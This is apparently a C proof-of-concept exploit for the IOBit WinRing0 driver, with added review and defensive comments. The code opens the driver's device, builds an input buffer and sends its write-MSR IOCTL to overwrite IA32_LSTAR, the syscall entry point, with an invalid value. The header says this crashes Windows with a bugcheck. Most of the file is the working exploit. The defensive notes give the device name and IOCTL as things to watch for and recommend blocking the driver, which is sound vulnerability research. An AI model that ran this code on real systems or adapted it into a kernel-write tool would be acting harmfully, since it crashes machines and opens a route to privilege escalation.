// Proof-of-concept for an exposed wrmsr primitive in the IOBit WinRing0 driver:
// any user-mode process that can open the device can ask the driver to write an
// attacker-chosen value into an attacker-chosen MSR. Here the target is
// 0xC0000082 (IA32_LSTAR, the 64-bit syscall entry point) and the value is an
// invalid address, which the original author documents as a BSoD.
//
// Defensive note: the observable here is a user-mode process opening
// \\.\IOBIT_WinRing0_1_3_0 and issuing IOCTL 0x9C402088; the remediation is to
// keep this driver from loading at all, since the driver itself does not
// restrict which MSRs may be written.
//
// NOTE(review): the header names after the two #include directives were lost in
// extraction; the calls below (CreateFileW, VirtualAlloc, DeviceIoControl,
// printf, memmove) need <windows.h>, <stdio.h> and <string.h> — restore from the
// original source.
#include #include
typedef unsigned long long QWORD; // DWORD64
DWORD IA32_MSR_LSTAR = 0xC0000082; // MSR_LSTAR
QWORD pBad = 0xFFFFFFFFFFFFFFFF; // Overwrite data, this will be the value written into MSR_LSTAR. (BSoD on Windows)

// Entry point. argc/argv are unused; the MSR index and value are the file-scope
// globals above. Every path leaves via ExitProcess, so the trailing return is
// never reached.
int main(int argc, char* argv[]) {
    HANDLE hDriver = CreateFileW(L"\\\\.\\IOBIT_WinRing0_1_3_0", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); // Get a handle to the driver
    if (hDriver != INVALID_HANDLE_VALUE) {
        printf("[i] Found driver\n");
        // NOTE(review): a fixed base address and PAGE_EXECUTE_READWRITE are not
        // needed for a plain input buffer; VirtualAlloc fails if 0x41000000 is
        // already mapped. Presumably copied from an earlier PoC — confirm.
        LPVOID lpInMemoryArea = VirtualAlloc((LPVOID)0x41000000, 0x100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (lpInMemoryArea == NULL) {
            printf("[!!!] Unable to allocate memory\n");
            // NOTE(review): ExitProcess takes a UINT; -1 is converted to 0xFFFFFFFF.
            ExitProcess(-1);
        }
        printf("[i]Allocated memory\n");
        // Input buffer layout as written here: DWORD MSR index at offset 0,
        // QWORD value at offset 4 (unaligned). Only 12 bytes are initialised;
        // the rest of the committed page is zero-filled by VirtualAlloc.
        memmove(lpInMemoryArea, &IA32_MSR_LSTAR, sizeof(DWORD));
        memmove((BYTE*)lpInMemoryArea + 0x4, &pBad, sizeof(QWORD));
        DWORD dwIoctl = 0x9C402088; // wrmsr IOCTL
        printf("[i] Sending IOCTL 0x%X\n", dwIoctl);
        DWORD dwBytesOut = 0;
        // NOTE(review): DeviceIoControl returns BOOL (nonzero on success), not
        // NTSTATUS, and dwLastError is never examined — the "was written" line
        // below prints regardless of whether the driver accepted the request.
        // The output buffer is NULL while the output size is 0x8, which
        // contradicts the "No output buffer needed" comment; whether the driver
        // requires a nonzero output length cannot be told from here.
        NTSTATUS dwLastError = DeviceIoControl(hDriver, dwIoctl, lpInMemoryArea, 0x16, NULL, 0x8, &dwBytesOut, NULL); // No output buffer needed
        // nlnInBufferSize is in Bytes (0x16 is needed)
        printf("MSR: 0x%X was written to with: 0x%I64X\n", IA32_MSR_LSTAR, pBad);
        // NOTE(review): hDriver is never released with CloseHandle; process
        // exit reclaims it, so this is an omission rather than a leak in practice.
    } else {
        printf("[!!!] Unable to find driver\n");
        ExitProcess(-1);
    }
    ExitProcess(0);
}